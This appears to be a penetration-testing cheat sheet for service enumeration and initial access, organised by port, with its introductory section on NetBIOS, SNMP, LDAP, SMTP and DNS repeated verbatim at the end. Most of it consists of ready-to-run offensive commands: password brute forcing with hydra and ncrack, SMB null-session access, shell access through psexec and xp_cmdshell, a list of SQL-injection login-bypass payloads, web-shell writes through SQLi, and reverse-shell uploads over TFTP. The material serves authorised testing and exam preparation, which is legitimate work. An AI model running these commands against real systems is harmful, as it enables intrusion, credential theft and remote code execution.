4. Enumeration After finding a vulnerability you will exploit it by enumeration. Enumeration is defined as the process of extracting user names, machine names, network resources, shares and services from a system. In this phase, the attacker creates an active connection to the system and performs directed queries to gain more information about the target. The gathered information is used to identify the vulnerabilities or weak points in system security and tries to exploit in the System gaining phase. Types of information enumerated by intruders: Network Resource and shares Users and Groups Routing tables Auditing and Service settings Machine names Applications and banners SNMP and DNS details Techniques for Enumeration Extracting user names using email ID's Extract information using the default password Brute Force Active Directory Extract user names using SNMP Extract user groups from Windows Extract information using DNS Zone transfer Services and Port to Enumerate TCP 53: DNS Zone transfer TCP 135: Microsoft RPC Endpoint Mapper TCP 137: NetBIOS Name Service TCP 139: NetBIOS session Service (SMB over NetBIOS) TCP 445: SMB over TCP (Direct Host) UDP 161: SNMP TCP/UDP 389: LDAP TCP/UDP 3368: Global Catalog Service TCP 25: Simple Mail Transfer Protocol (SMTP) NetBIOS Enumeration NetBIOS stands for Network Basic Input Output System. It Allows computer communication over a LAN and allows them to share files and printers. NetBIOS names are used to identify network devices over TCP/IP (Windows). It must be unique on a network, limited to 16 characters where 15 characters are used for the device name and the 16th character is reserved for identifying the type of service running or name record type. Attackers use the NetBIOS enumeration to obtain: List of computers that belong to a domain List of shares on the individual hosts on the network Policies and passwords Commands and tools used: Nbtstat: utility used to find protocol statistics, NetBIOS name table and name cache details Superscan: GUI tool used to enumerate windows machine Net view: command line tool to identify shared resources on a network SNMP Enumeration SNMP (Simple Network Management Protocol) is an application layer protocol which uses UDP protocol to maintain and manage routers, hubs and switches other network devices on an IP network. SNMP is a very common protocol found enabled on a variety of operating systems like Windows Server, Linux & UNIX servers as well as network devices like routers, switches etc. SNMP enumeration is used to enumerate user accounts, passwords, groups, system names, devices on a target system. It consists of three major components: Managed Device: A managed device is a device or a host (technically known as a node) which has the SNMP service enabled. These devices could be routers, switches, hubs, bridges, computers etc. Agent: An agent can be thought of as a piece of software that runs on a managed device. Its primary job is to convert the information into SNMP compatible format for the smooth management of the network using SNMP protocol. Network Management System (NMS): These are the software systems that are used for monitoring of the network devices. An agent running on every SNMP device will be providing access to a read and writable database. The database is referred to as the management information base (MIB) which is organized hierarchically and is a virtual database containing a formal description of all the network objects identified by a specific object identifier (OID) that can be managed using SNMP. It's a giant repository of values and settings. There is a manager involved in the process, and the manager will query the agent for various details. Community strings is a text string used to authenticate communications between the management stations and network devices on which SNMP agents are hosted. Community Strings travel in clear text over the network, hence are subject to network sniffing attacks. Community Strings are sent with every network packet exchanged between the node and management station. Two types of community strings: Read only: This mode permits querying the device and reading the information, but does not permit any kind of changes to the configuration. The default community string for this mode is “public.” Read Write: In this mode, changes to the device are permitted; hence if one connects with this community string, we can even modify the remote device ’s configurations. The default community string for this mode is “private.” when the community strings are left at the default settings, attackers take the opportunity and find the loopholes in it. Few tools: OpUtils Network Monitoring Toolset - http://www.manageengine.com SolarWinds ( best SNMP enumeration tool) - www.solarwinds.com command line tools: SNMP-WALK, SNMP-CHECK Countermeasures: Remove or disable SNMP agents on hosts Block port 161 at all perimeter network access devices Restrict access to specific IP addresses Use SNMPv3 (more secure) Implement the Group Policy security option called "Additional restrictions for anonymous connections" Access to null session pipes, null session shares, and IPsec filtering should also be restricted LDAP Enumeration The Lightweight Directory Access Protocol is a protocol used to access directory listings within Active Directory or from other Directory Services. A directory is usually compiled in a hierarchical and logical format, rather like the levels of management and employees in a company. LDAP tends to be tied into the Domain Name System to allow integrated quick lookups and fast resolution of queries. LDAP generally runs on port 389 and like other protocols tends to usually conform to a distinct set of rules (RFC's). It is possible to query the LDAP service, sometimes anonymously to determine a great deal of information that could glean the tester, valid usernames, addresses, departmental details that could be utilised in a brute force or social engineering attack. Tools: Jxplorer - http://www.jxplorer.org/ LDAP Admin Tool - http://www.ldapsoft.com Countermeasures: Use NTLM or Basic authentication to limit access to known users only. By default, LDAP traffic is transmitted unsecured; use SSL technology to encrypt the traffic. Select a username different from your email address and enable account lockout. NTP Enumeration The Network Time Protocol is a protocol for synchronizing time across your network, this is especially important when utilizing Directory Services. There exists a number of time servers throughout the world that can be used to keep systems synced to each other. NTP utilizes UDP port 123. Through NTP enumeration you can gather information such as lists of hosts connected to NTP server, IP addresses, system names, and OSs running on the client system in a network. All this information can be enumerated by querying NTP server SMTP Enumeration The Simple Mail Transport Protocol is used to send email messages as opposed to POP3 or IMAP which can be used to both send and receive messages. SMTP relies on using Mail Exchange (MX) servers to direct the mail to via the Domain Name Service, however, should an MX server not be detected, SMTP will revert and try an A or alternatively SRV records. SMTP generally runs on port 25. SMTP enumeration allows us to determine valid users on the SMTP server. This is done with the help built-in SMTP commands, they are VRFY - This command is used for validating users. EXPN - This command tells the actual delivery address of aliases and mailing lists. RCPT TO - It defines the recipients of the message. Tool: NestScanTools Pro Countermeasures: Configure SMTP server either to ignore email messages to unknown recipients. Don’t include information like mail relay systems being used, Internal IP address or host information. Disable open relay feature. DNS Enumeration DNS enumeration is the process of locating all the DNS servers and their corresponding records for an organization. DNS enumeration will yield usernames, computer names, and IP addresses of potential target systems. The list of DNS record provides an overview of types of resource records (database records) stored in the zone files of the Domain Name System (DNS). The DNS implements a distributed, hierarchical, and redundant database for information associated with Internet domain names and addresses. DNS Zone Transfer used to replicate DNS data across a number of DNS servers or to back up DNS files. A user or server will perform a specific zone transfer request from a ―name server. If the name server allows zone transfers by an anonymous user to occur, all the DNS names and IP addresses hosted by the name server will be returned in human-readable ASCII text. Tools: nslookup maltego dnenum dnsrecon Countermeasures: Disable Zone transfer by untrusted hosts Ensure that private hostnames are not referenced to IP addresses within the DNS zone files of publicly accessible DNS servers. Use premium registration services. Scanning NMAP TCP quick > sudo nmap -Pn -v -sS -sV -sC -oN tcp-quick.nmap IP NMAP TCP Full > sudo nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oN tcp-full.nmap -sV IP NMAP TCP - Repeat if extra ports found > sudo nmap -Pn -v -sS -A -oN tcp-extra.nmap -p PORTS IP NMAP UDP quick > sudo nmap -Pn -v -sU -sV --top-ports=30 -oN udp-quick.nmap IP NMAP UDP 1000 > sudo nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T4 -oN udp-1000.nmap IP NMAP UDP - Repeat if extra ports found > sudo nmap -Pn -sU -A -oN udp-extra.nmap -p PORTS IP Enumeration FTP - Port 21 Check for FTP version vulns Check for Anonymous login Check for Read access Check for Web root or root directories of any other accessible service Check for write access SSH - Port 22 Check for SSH version vulns Check for User enumeration if necessary Check if host key was seen somewhere else Check if it prompts for a password - means password login is allowed for some users nmap -sV --script=ssh-hostkey -p22 IP Bruteforce if necessary with CeWL, Hydra, Patator, Crowbar, MSF (if port gets filtered, there's defense mechanisms - fail2ban) Telnet - Port 23 Connect and check for service running SMTP - Port 25 Check for SMTP vulns Check version with HELO / HELLO POP - PORT 110 Connect using telnet user pass LIST - to list emails RETR - To retrieve emails DNS - Port 53 Might indicate a domain controller on Windows Check for zone transfer - Kerberos - Port 88 Indication that its a DC Netbios - Port 139 > nmblookup -A IP > nbtscan IP > On older hosts, this port servers SMB / SAMBA, scan by adding 'client min protocol = LANMAN1' to GLOBAL setting in /etc/samba/smb.conf or by using --option='client min protocol'=LANMAN1 with smbclient RPC - PORT 135 > sudo nmap -sS -Pn -sV --script=rpcinfo.nse -p135 0 > rpcinfo IP > rpcclient -U "" -N [ip] LDAP - Ports 389,636,3268,326 > sudo nmap -sS -Pn -sV --script=ldap* -p389,636,3268,3269 WEB - PORT 80 / 443 NMAP Web > sudo nmap -Pn -sC -p80,443 Checks Browse the webapp Check for usernames, keywords Check Web server vulns Check for Cgi's shellshock Check Certificates for hostname Check robots.txt Check sitemap.xml Check for known software - View source Check for default credentials Check for input validation - SQLi Check for OS Command execution Check for LFI / RFI Dirb > dirb IP > dirb with -X extensions based on web technology, .php,.asp,.txt,.jsp > dirb IP -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246' Gobuster > gobuster dir --url IP --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt > gobuster dir --url IP --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt -k -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246' Nikto > nikto -host IP SMB - Ports NMAP vuln scripts > sudo nmap -Pn --script=smb-proto* -p139,445 > sudo nmap -Pn --script=smb-os-discovery.nse -p139,445 > sudo nmap -Pn --script=smb-enum* -p139,445 > sudo nmap -Pn --script=smb-vuln* -p139,445 > nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse Check for Null logins > nmap --script smb-enum-shares -p 139,445 > smbclient -L \\\\ip\\ -N > smbclient -m=SMB2 -L \\\\Hostname\\ -N Connect to a share with Null session > smbclient \\\\IP\\$Admin -N > smbmap -H IP > smbmap -u DoesNotExists -H IP > enum4linux -a IP Check permissions on a connect share > smb: \> showacls # enable acl listing > smb: \> dir # list directories with acls Mount share on local machine > sudo mount -t cifs //10.10.10.134/SHARENAME ~/path/to/mount_directory List share with credentials > smbmap -u USERNAME -p PASSWORD -d DOMAIN.TLD -H Recursively list all files in share > smbmap -R -H > smbmap -R Replication -H With smbclient (recurse downloads all files) > smbclient ///Replication > smb: \> recurse ON > smb: \> prompt OFF > smb: \> mget * Upload / Download specific files > smbmap -H --download 'Replication\active.htb\ > smbmap -H --upload test.txt SHARENAME/test.txt NFS - Port 2049 > showmount -e IP > mount -t nfs -o vers=3 10.1.1.1:/home/ ~/home > mount -t nfs4 -o proto=tcp,port=2049 127.0.0.1:/srv/Share mountpoint TFTPD - UDP 69 > tftp client to connect > atftp is a better client > Can be used to read system files, MSSQL password mdf file Finding exploits Search on EDB and searchsploit Check each service on CVE details for RCE / LFI / RFI / SQLI issues Google search the with the service banner NETWORK ENUMERATION Network enum - Ports A quick checklist for possible attack vectors through the different ports TCP 21 - FTP Checks Check if you have anonymous access Check if you can upload a file to trigger a webshell through the webapp Check if you can download backup files to extract included passwords Check the version of FTP for exploits Commands Login to ftp server (for anonymous access, use "anonymous":"anonymous") ftp $ip FTP specific nmap scan nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip Tip: Before starting scans, set a bash variable to the IP address you are scanning likeip=10.11.1.1.Then the $ip value in the commands of this cheat sheet will be filled in automatically. ​ 22 - SSH Checks Try easy username-password combinations Check for username enumeration vulnerabilities Check version for vulnerabilities (Only when getting desperate) Try brute force with Hydra, Medussa, ... Commands Nmap scan nmap -p 22000 -sV -Pn -T4 --script=ssh* $ip Brute force hydra -v -L user.txt -P /usr/share/wordlists/rockyou.txt -t 16 $ip ssh hydra -l gibson -P /tmp/alpha.txt -T 20 $ip ssh Connect through found key #make key only accessible by the current user chmod 0600 private.key ssh user@$ip -i user.key ​ 25 - SMTP Checks Check for user enumeration Check version for exploits Commands nmap scan nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip user enumeration #manual way nc -nvv $ip 25 VRFY root (exists if user is replied as "250 Georgia") (doesn't exist if user is replied as "551 user not local") ​ #automated way smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t $ip ​ 80/443 - HTTP(S) Checks Login portals try the default credentials off the application try usernames already seen throughout the application or in other services like SMTP try SQL injection bypasses try registering a new user brute force with hydra, medusa, ... Check robots.txt for hidden directories Brute force directories to find hidden content Check for passwords/URLs/versions/... in comments of web app Check version numbers for known exploits Check changelog for version information Estimate version based on copyright date (if not automatically adjusted) Check if specific CMS is used like WordPress and then use platform specific scanners ways to RCE check for file upload functionalities (if uploads are filtered, try alternative extensions) execute commands through SQLi Shellshock command injection trigger injected code through path traversal Enumeration scans Directory brute force #start of with general scan gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log -t 50 #add extensions gobuster dir -u $ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log -t 100 -x php,txt,cgi,sh,pl,py -s "200,204,301,302,307,403,500" nmap scan nmap -sV -Pn --script=ssl-heartbleed,http-adobe-coldfusion-apsa1301.nse,http-apache-negotiation.nse,http-apache-server-status.nse,http-aspnet-debug.nse,http-auth-finder.nse,http-auth.nse,http-avaya-ipoffice-users.nse,http-awstatstotals-exec.nse,http-axis2-dir-traversal.nse,http-backup-finder.nse,http-barracuda-dir-traversal.nse,http-bigip-cookie.nse,http-brute.nse,http-cakephp-version.nse,http-cisco-anyconnect.nse,http-coldfusion-subzero.nse,http-comments-displayer.nse,http-config-backup.nse,http-cookie-flags.nse,http-cors.nse,http-cross-domain-policy.nse,http-csrf.nse,http-date.nse,http-default-accounts.nse,http-devframework.nse,http-dlink-backdoor.nse,http-dombased-xss.nse,http-domino-enum-passwords.nse,http-drupal-enum-users.nse,http-drupal-enum.nse,http-enum.nse,http-errors.nse,http-exif-spider.nse,http-feed.nse,http-fileupload-exploiter.nse,http-form-brute.nse,http-form-fuzzer.nse,http-frontpage-login.nse,http-git.nse,http-gitweb-projects-enum.nse,http-headers.nse,http-huawei-hg5xx-vuln.nse,http-iis-short-name-brute.nse,http-iis-webdav-vuln.nse,http-internal-ip-disclosure.nse,http-joomla-brute.nse,http-jsonp-detection.nse,http-litespeed-sourcecode-download.nse,http-ls.nse,http-majordomo2-dir-traversal.nse,http-mcmp.nse,http-method-tamper.nse,http-methods.nse,http-mobileversion-checker.nse,http-ntlm-info.nse,http-open-redirect.nse,http-passwd.nse,http-php-version.nse,http-phpmyadmin-dir-traversal.nse,http-phpself-xss.nse,http-proxy-brute.nse,http-put.nse,http-qnap-nas-info.nse,http-rfi-spider.nse,http-robots.txt.nse,http-security-headers.nse,http-server-header.nse,http-shellshock.nse,http-sitemap-generator.nse,http-sql-injection.nse,http-stored-xss.nse,http-svn-enum.nse,http-svn-info.nse,http-title.nse,http-tplink-dir-traversal.nse,http-trace.nse,http-traceroute.nse,http-trane-info.nse,http-unsafe-output-escaping.nse,http-useragent-tester.nse,http-userdir-enum.nse,http-vhosts.nse,http-vlcstreamer-ls.nse,http-vmware-path-vuln.nse,http-vuln-cve2006-3392.nse,http-vuln-cve2009-3960.nse,http-vuln-cve2010-0738.nse,http-vuln-cve2010-2861.nse,http-vuln-cve2011-3368.nse,http-vuln-cve2012-1823.nse,http-vuln-cve2013-0156.nse,http-vuln-cve2013-6786.nse,http-vuln-cve2013-7091.nse,http-vuln-cve2014-2126.nse,http-vuln-cve2014-2127.nse,http-vuln-cve2014-2128.nse,http-vuln-cve2014-3704.nse,http-vuln-cve2014-8877.nse,http-vuln-cve2015-1427.nse,http-vuln-cve2015-1635.nse,http-vuln-cve2017-1001000.nse,http-vuln-cve2017-5638.nse,http-vuln-cve2017-5689.nse,http-vuln-cve2017-8917.nse,http-vuln-misfortune-cookie.nse,http-vuln-wnr1000-creds.nse,http-waf-detect.nse,http-waf-fingerprint.nse,http-webdav-scan.nse,http-wordpress-brute.nse,http-wordpress-enum.nse,http-wordpress-users.nse,http-xssed.nse,membase-http-info.nse -p 80 $ip webdav scanning davtest --url http://$ip davtest -move -sendbd auto -url http://$ip:8080/webdav/ cadaver http://$ip:8080/webdav/ Nikto scans nikto -host $ip | tee nikto.log Login portals brute force login portals #basic auth hydra -l user -P /usr/share/wordlists/rockyou.txt -f $ip http-get /path #login form hydra -L users.txt -P users.txt $ip http-post-form ":login_username=^USER^&secretkey=^PASS^&:" #create custom password list cewl -w cewl_passlist.txt -d 5 10.11.1.39/otrs/index.pl Standard credentials you should try when being blocked by login portal admin:admin admin:password admin:administrator admin:(name of box) user:user user:password user:12345 guest:guest root:root (name of box):(name of box) (default account):(name of application) Try SQL injections to bypass the login form ' or 1=1;-- ' or '1'='1 ' or 1=1;# ') or ('x'='x ' or like '%';-- ' or 1=1 LIMIT 1;-- admin' -- admin' # admin'/* ' or 1=1-- ' or 1=1# ' or 1=1/* ') or '1'='1-- ') or ('1'='1— ' or 1/* */ =1 -- admin' or 'a'='a '# File upload Try alternative extensions for file uploads Php > upload as pHp / phP / test.php.jpg / php - phtml, .php, .php3, .php4, .php5, and .inc asp - asp, .aspx perl - .pl, .pm, .cgi, .lib jsp - .jsp, .jspx, .jsw, .jsv, and .jspf Coldfusion - .cfm, .cfml, .cfc, .dbm File traversal list Path Traversal Cheat Sheet: Windows | GracefulSecurity gracefulsecurity.com RCE through SQLi #Through file creation union all select "",2,3,4,5,6 into OUTFILE '/var/www/html/shell.php' #if running as database admin, use xp_cmdshell http://www.example.com/news.asp?id=1; exec master.dbo.xp_cmdshell 'command' '; exec master.dbo.xp_cmdshell 'command' #On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default: EXEC sp_configure 'show advanced options', 1;-- RECONFIGURE;-- EXEC sp_configure 'xp_cmdshell', 1;-- RECONFIGURE;-- #On MSSQL 2000: EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll';-- If you use exploits for web apps but they don't work as expected: proxy network traffic through burp and see the sent requests ​ 110 - POP3 Checks Check version for exploits Check mails for the presence of credentials Commands manually login to the application #connect and check for banner telnet $ip 110 #guess login credentials USER pelle PASS admin #list all emails list #retrieve email number 5 for example retr 5 ​ 111 - NFS/RPC Checks Check for passwords in files on mountable drives Commands #check general rpc info rpcinfo $ip ​ #Check what shares you can mount showmount -e $ip ​ #mounting the share #make the directory mkdir /mnt/share #mount the share mount -t nfs $ip:/share /mnt/share -nolock Keep mountable shares in mind as they might be used in root squashing attacks to elevate your privileges to root. 139/445 - SMB Checks Check for null sessions Check the permissions of users you already have Check for passwords in files Attempt brute force on enumerated users Check for EternalBlue Check samba version (if Linux) Commands (Automated) nmap scan #general scan nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse $ip -p 445 ​ #vulnerability scan nmap --script smb-vuln* -p 445 -oA nmap_smb_vulns $ip Check samba versions #save code below as samba_version.sh and make it executable ./samba_version.sh if [ -z $1 ]; then echo "Usage: ./samba_version.sh RHOST {RPORT}" && exit; else rhost=$1; fi if [ ! -z $2 ]; then rport=$2; else rport=139; fi tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' | grep -oP 'UnixSamba.*[0-9a-z]' | tr -d '\n' & echo -n "$$" echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null sleep 0.5 && echo "" enum4linux enum4linux -a $ip smbmap #list general folders smbmap -H $ip ​ #recursively list dirs and files smbmap -R $sharename -H $ip smbmap -R "Users" -H $ip -u Guest ​ #download a file smbmap -R $sharename -H $ip -A $fileyouwanttodownload -q CrackMapExec #check if you can connect through null sessions (check what rights you have on the shares) cme smb $ip -u '' -p '' --shares cme smb $ip -u '' -p '' --shares --port 139 #enumerate the users #rid brute forcing cme smb $ip -u "" -p "" --rid-brute #active sessions cme smb $ip -u '' -p '' --loggedon-users #users in general cme smb $ip -u '' -p '' --users ​ #enumerate the groups #local groups cme smb $ip -u '' -p '' --local-groups #domain groups cme smb $ip -u '' -p '' --groups ​ #check for the password policy cme smb $ip -u "" -p "" --pass-pol mount shares and inspect files manually #smbclient smbclient -L $ip smbclient //$ip/tmp smbclient \\\\192.168.1.105\\ipc$ -U john smbclient //$ip/ipc$ -U john ​ #mounting the share mkdir /mnt/targetshare mount -t cifs \\172.16.20.88\ipc$ -o username=[username] /mnt/targetshare brute force smb hydra -l Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt $ip smb -V -f #in OSCP the passwords are often equal to the username hydra -L usernames.txt -P usernames.txt $ip smb -V -f Gaining shell through psexec (user needs to be admin) #copy script cp /usr/share/doc/python-impacket/examples/psexec.py . ​ #specific command test python psexec.py :@10.11.1.227 whoami ​ #shell rlwrap python psexec.py :@10.11.1.227 ​ #NOTE: be carefull with exclamation marks in passwords: rottenadmin:P@ssword123\!@192.168.194.140 ​ #through crackmapexec (didn't always work for me) cme smb 10.11.1.227 -u "backup" -p "backup" -x whoami 1433 - MSSQL Checks Try default credentials "sa:password" Brute force creds Check database content for new passwords Check version for exploits RCE through xp_cmdshell functionality through injecting payload in output file, placing it in webroot and triggering it through webapp Commands nmap nmap -p 1433 --script='banner,(ms-sql* or ssl*) and not (brute or broadcast or dos or external or fuzzer)' $ip -o 1433_nmap_mssql credential brute force nmap -p 1433 --script ms-sql-brute --script-args passdb=/usr/share/seclists/Passwords/darkweb2017-top1000.txt $ip manually logging in and gaining shell #login sqsh -S $ip -U sa -P password sqsh -S $ip:27900 -U sa -P password ​ #execute commands xp_cmdshell 'date' go ​ 3306 - MySQL Checks Try default credentials "root":"" Brute force credentials Check database content for new passwords Check version for exploits Commands nmap nmap -sV -Pn --script=mysql-audit.nse,mysql-brute.nse,mysql-databases.nse,mysql-dump-hashes.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-query.nse,mysql-users.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p 3306 -o 3306_nmap_mysql $ip try default password mysql --host=$ip -u root -p ​ 3389 - RDP Checks Check if you can login with default guest account and blank password Check if you can brute force users Check for BlueKeep Commands nmap nmap -p 3389 --script=rdp-enum-encryption,rdp-vuln-ms12-020 $ip -o 3389_nmap_rdp manually login rdesktop $ip ​ #Try default guest account "guest":"" rdesktop -u guest $ip -g 94% Start brute force ncrack -vv --user Administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip ncrack -vv --user Administrator -P /usr/share/seclists/Passwords/darkweb2017-top100.txt rdp://$ip 5900 - VNC Checks check for easy VNC passwords check for exploits for VNC version brute force VNC password Commands nmap nmap -sV -Pn -p 5900 --script=vnc-info,vnc-title,realvnc-auth-bypass $ip -oA 5900_nmap_VNC VNC brute force on base password hydra -s 5900 -P /usr/share/seclists/Passwords/darkweb2017-top10.txt -t 30 $ip vnc ​ UDP 53 - DNS Checks Try zone transfer Brute force subdomains Commands do DNS lookup specifying the DNS server nslookup #set nameserver to ip of box > server 10.10.10.13 #ask for dns of box ip address > 10.10.10.13 subdomain enumeration / brute force dig axfr @$ip test.htb fierce -dns ext.recon.lan -dnsserver 172.16.90.53 gobuster dns -d ext.recon.lan -r 172.16.90.53 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt ​ 69 - TFTP Checks search for files to find sensitive info like passwords upload shells to trigger them in web app Commands nmap nmap -sU -p 69 --script tftp-enum.nse $ip Interact with TFTP protocol #setup the connection tftp 172.16.200.100 #get a file tftp> get /etc/passwd #upload reverse shell tftp> put shell.php automated search sensitive files (Metasploit) msfconsole use tftpbrute set dictionary /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt 161 - SNMP Checks Try the default community strings 'public' and 'private' Enumerate version of OS/ users /processes Commands nmap nmap -sU -p161 --script "snmp-*" $ip scan range of ip addresses for snmp strings #only try "public" and "private" onesixtyone -i targets.list ​ #try 100+ community strings onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $ip enumerate information with known community string # enumerate windows users snmpwalk -c public -v1 192.168.11.204 1.3.6.1.4.1.77.1.2.25 # enumerates running processes snmpwalk -c public -v1 192.168.11.204 1.3.6.1.2.1.25.4.2.1. Types of information enumerated by intruders: Network Resource and shares Users and Groups Routing tables Auditing and Service settings Machine names Applications and banners SNMP and DNS details Techniques for Enumeration Extracting user names using email ID's Extract information using the default password Brute Force Active Directory Extract user names using SNMP Extract user groups from Windows Extract information using DNS Zone transfer Services and Port to Enumerate TCP 53: DNS Zone transfer TCP 135: Microsoft RPC Endpoint Mapper TCP 137: NetBIOS Name Service TCP 139: NetBIOS session Service (SMB over NetBIOS) TCP 445: SMB over TCP (Direct Host) UDP 161: SNMP TCP/UDP 389: LDAP TCP/UDP 3368: Global Catalog Service TCP 25: Simple Mail Transfer Protocol (SMTP) NetBIOS Enumeration NetBIOS stands for Network Basic Input Output System. It Allows computer communication over a LAN and allows them to share files and printers. NetBIOS names are used to identify network devices over TCP/IP (Windows). It must be unique on a network, limited to 16 characters where 15 characters are used for the device name and the 16th character is reserved for identifying the type of service running or name record type. Attackers use the NetBIOS enumeration to obtain: List of computers that belong to a domain List of shares on the individual hosts on the network Policies and passwords Commands and tools used: Nbtstat: utility used to find protocol statistics, NetBIOS name table and name cache details Superscan: GUI tool used to enumerate windows machine Net view: command line tool to identify shared resources on a network SNMP Enumeration SNMP (Simple Network Management Protocol) is an application layer protocol which uses UDP protocol to maintain and manage routers, hubs and switches other network devices on an IP network. SNMP is a very common protocol found enabled on a variety of operating systems like Windows Server, Linux & UNIX servers as well as network devices like routers, switches etc. SNMP enumeration is used to enumerate user accounts, passwords, groups, system names, devices on a target system. It consists of three major components: Managed Device: A managed device is a device or a host (technically known as a node) which has the SNMP service enabled. These devices could be routers, switches, hubs, bridges, computers etc. Agent: An agent can be thought of as a piece of software that runs on a managed device. Its primary job is to convert the information into SNMP compatible format for the smooth management of the network using SNMP protocol. Network Management System (NMS): These are the software systems that are used for monitoring of the network devices. An agent running on every SNMP device will be providing access to a read and writable database. The database is referred to as the management information base (MIB) which is organized hierarchically and is a virtual database containing a formal description of all the network objects identified by a specific object identifier (OID) that can be managed using SNMP. It's a giant repository of values and settings. There is a manager involved in the process, and the manager will query the agent for various details. Community strings is a text string used to authenticate communications between the management stations and network devices on which SNMP agents are hosted. Community Strings travel in clear text over the network, hence are subject to network sniffing attacks. Community Strings are sent with every network packet exchanged between the node and management station. Two types of community strings: Read only: This mode permits querying the device and reading the information, but does not permit any kind of changes to the configuration. The default community string for this mode is “public.” Read Write: In this mode, changes to the device are permitted; hence if one connects with this community string, we can even modify the remote device ’s configurations. The default community string for this mode is “private.” when the community strings are left at the default settings, attackers take the opportunity and find the loopholes in it. Few tools: OpUtils Network Monitoring Toolset - http://www.manageengine.com SolarWinds ( best SNMP enumeration tool) - www.solarwinds.com command line tools: SNMP-WALK, SNMP-CHECK Countermeasures: Remove or disable SNMP agents on hosts Block port 161 at all perimeter network access devices Restrict access to specific IP addresses Use SNMPv3 (more secure) Implement the Group Policy security option called "Additional restrictions for anonymous connections" Access to null session pipes, null session shares, and IPsec filtering should also be restricted LDAP Enumeration The Lightweight Directory Access Protocol is a protocol used to access directory listings within Active Directory or from other Directory Services. A directory is usually compiled in a hierarchical and logical format, rather like the levels of management and employees in a company. LDAP tends to be tied into the Domain Name System to allow integrated quick lookups and fast resolution of queries. LDAP generally runs on port 389 and like other protocols tends to usually conform to a distinct set of rules (RFC's). It is possible to query the LDAP service, sometimes anonymously to determine a great deal of information that could glean the tester, valid usernames, addresses, departmental details that could be utilised in a brute force or social engineering attack. Tools: Jxplorer - http://www.jxplorer.org/ LDAP Admin Tool - http://www.ldapsoft.com Countermeasures: Use NTLM or Basic authentication to limit access to known users only. By default, LDAP traffic is transmitted unsecured; use SSL technology to encrypt the traffic. Select a username different from your email address and enable account lockout. NTP Enumeration The Network Time Protocol is a protocol for synchronizing time across your network, this is especially important when utilizing Directory Services. There exists a number of time servers throughout the world that can be used to keep systems synced to each other. NTP utilizes UDP port 123. Through NTP enumeration you can gather information such as lists of hosts connected to NTP server, IP addresses, system names, and OSs running on the client system in a network. All this information can be enumerated by querying NTP server SMTP Enumeration The Simple Mail Transport Protocol is used to send email messages as opposed to POP3 or IMAP which can be used to both send and receive messages. SMTP relies on using Mail Exchange (MX) servers to direct the mail to via the Domain Name Service, however, should an MX server not be detected, SMTP will revert and try an A or alternatively SRV records. SMTP generally runs on port 25. SMTP enumeration allows us to determine valid users on the SMTP server. This is done with the help built-in SMTP commands, they are VRFY - This command is used for validating users. EXPN - This command tells the actual delivery address of aliases and mailing lists. RCPT TO - It defines the recipients of the message. Tool: NestScanTools Pro Countermeasures: Configure SMTP server either to ignore email messages to unknown recipients. Don’t include information like mail relay systems being used, Internal IP address or host information. Disable open relay feature. DNS Enumeration DNS enumeration is the process of locating all the DNS servers and their corresponding records for an organization. DNS enumeration will yield usernames, computer names, and IP addresses of potential target systems. The list of DNS record provides an overview of types of resource records (database records) stored in the zone files of the Domain Name System (DNS). The DNS implements a distributed, hierarchical, and redundant database for information associated with Internet domain names and addresses. DNS Zone Transfer used to replicate DNS data across a number of DNS servers or to back up DNS files. A user or server will perform a specific zone transfer request from a ―name server. If the name server allows zone transfers by an anonymous user to occur, all the DNS names and IP addresses hosted by the name server will be returned in human-readable ASCII text. Tools: nslookup maltego dnenum dnsrecon Countermeasures: Disable Zone transfer by untrusted hosts Ensure that private hostnames are not referenced to IP addresses within the DNS zone files of publicly accessible DNS servers. Use premium registration services.